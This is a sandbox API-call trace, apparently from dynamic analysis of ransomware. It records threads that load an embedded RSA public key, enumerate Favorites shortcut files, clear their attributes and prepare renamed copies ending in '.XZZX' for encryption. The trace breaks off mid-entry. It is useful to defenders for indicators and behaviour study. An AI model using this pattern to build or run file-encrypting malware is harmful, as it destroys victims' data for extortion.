[0136.358] SetErrorMode (uMode=0x1) returned 0x1 [0136.359] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.359] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x4249a9f1, Data2=0x3c1d, Data3=0x453a, Data4=([0]=0x82, [1]=0x45, [2]=0xfc, [3]=0x90, [4]=0xd5, [5]=0xfe, [6]=0x1c, [7]=0xfa))) returned 0x0 [0136.359] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0136.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0136.359] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\C62CBC4D10416F924249A9F1146253DA.XZZX") returned 74 [0136.359] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0136.359] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x20) returned 0 [0136.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 474 os_tid = 0xac0 [0136.507] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.507] lstrcpyW (in: lpString1=0x420f460, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0136.507] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0136.507] SetErrorMode (uMode=0x1) returned 0x1 [0136.507] lstrcpyW (in: lpString1=0x420f860, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0136.507] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb349657c, Data2=0x864c, Data3=0x411f, Data4=([0]=0x94, [1]=0x93, [2]=0xdc, [3]=0x8a, [4]=0xb6, [5]=0xb0, [6]=0x16, [7]=0x6e))) returned 0x0 [0136.507] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0136.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0136.507] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\A4E908D022298F34B349657C264A737C.XZZX") returned 74 [0136.507] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="XZZX") returned 0x0 [0136.507] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x20) returned 0 [0136.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 475 os_tid = 0xac4 [0136.670] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.670] lstrcpyW (in: lpString1=0x420f460, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0136.670] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0136.670] SetErrorMode (uMode=0x1) returned 0x1 [0136.670] lstrcpyW (in: lpString1=0x420f860, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0136.671] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xd77008ea, Data2=0x58d3, Data3=0x4ed8, Data4=([0]=0x99, [1]=0x45, [2]=0x58, [3]=0xb6, [4]=0x49, [5]=0x6d, [6]=0x20, [7]=0x4d))) returned 0x0 [0136.671] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0136.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0136.671] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\1467C8DE1B5B3C08D77008EA1F7C2050.XZZX") returned 87 [0136.671] StrStrW (lpFirst="IE Add-on site.url", lpSrch="XZZX") returned 0x0 [0136.671] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x20) returned 0 [0136.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 476 os_tid = 0xac8 [0136.818] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.818] lstrcpyW (in: lpString1=0x420f460, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0136.818] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0136.818] SetErrorMode (uMode=0x1) returned 0x1 [0136.818] lstrcpyW (in: lpString1=0x420f860, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0136.818] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x5a13d582, Data2=0x14e6, Data3=0x4224, Data4=([0]=0x9c, [1]=0xfa, [2]=0x29, [3]=0xbc, [4]=0xd3, [5]=0x80, [6]=0x5, [7]=0x6f))) returned 0x0 [0136.818] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0136.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0136.819] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\7A7FFACC05663C585A13D582098720A0.XZZX") returned 87 [0136.819] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="XZZX") returned 0x0 [0136.819] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x20) returned 0 [0136.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 477 os_tid = 0xacc [0136.975] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.975] lstrcpyW (in: lpString1=0x420f460, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0136.975] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0136.975] SetErrorMode (uMode=0x1) returned 0x1 [0136.975] lstrcpyW (in: lpString1=0x420f860, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0136.975] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb79051c4, Data2=0x49d9, Data3=0x4d2c, Data4=([0]=0x9f, [1]=0xde, [2]=0x92, [3]=0x86, [4]=0x95, [5]=0xe8, [6]=0x30, [7]=0x3c))) returned 0x0 [0136.975] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0136.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0136.975] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\C0A633241642F64CB79051C41A63DA94.XZZX") returned 87 [0136.975] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="XZZX") returned 0x0 [0136.975] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x20) returned 0 [0136.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 478 os_tid = 0xad0 [0137.130] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.130] lstrcpyW (in: lpString1=0x420f460, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0137.130] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0137.130] SetErrorMode (uMode=0x1) returned 0x1 [0137.130] lstrcpyW (in: lpString1=0x420f860, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0137.130] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x501bfd98, Data2=0xbefe, Data3=0x448c, Data4=([0]=0x91, [1]=0x7e, [2]=0x61, [3]=0x6a, [4]=0xe3, [5]=0x2f, [6]=0x56, [7]=0xdb))) returned 0x0 [0137.130] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0137.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0137.131] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\41FC6CD03323EAE8501BFD983744CF30.XZZX") returned 87 [0137.131] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="XZZX") returned 0x0 [0137.131] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x20) returned 0 [0137.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 479 os_tid = 0xad4 [0137.287] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.287] lstrcpyW (in: lpString1=0x420f460, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0137.287] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0137.287] SetErrorMode (uMode=0x1) returned 0x1 [0137.287] lstrcpyW (in: lpString1=0x420f860, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0137.287] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x45b69581, Data2=0xd68e, Data3=0x43b5, Data4=([0]=0xbf, [1]=0xfd, [2]=0xeb, [3]=0xa7, [4]=0x19, [5]=0xe7, [6]=0xd9, [7]=0xd7))) returned 0x0 [0137.287] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0137.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0137.287] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\4C40C38E38BEDC6645B695813CDFC0AE.XZZX") returned 87 [0137.287] StrStrW (lpFirst="Microsoft Store.url", lpSrch="XZZX") returned 0x0 [0137.287] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x20) returned 0 [0137.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 480 os_tid = 0xad8 [0137.455] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.455] lstrcpyW (in: lpString1=0x420f460, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0137.455] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.455] SetErrorMode (uMode=0x1) returned 0x1 [0137.455] lstrcpyW (in: lpString1=0x420f860, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0137.455] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb2508298, Data2=0x5ba0, Data3=0x41df, Data4=([0]=0xbc, [1]=0x55, [2]=0x46, [3]=0xb4, [4]=0xdd, [5]=0xae, [6]=0xe4, [7]=0x62))) returned 0x0 [0137.455] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0137.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0137.455] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\10BDA70017937060B25082981BB454A8.XZZX") returned 81 [0137.455] StrStrW (lpFirst="MSN Autos.url", lpSrch="XZZX") returned 0x0 [0137.455] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x20) returned 0 [0137.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 481 os_tid = 0xadc [0137.599] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END 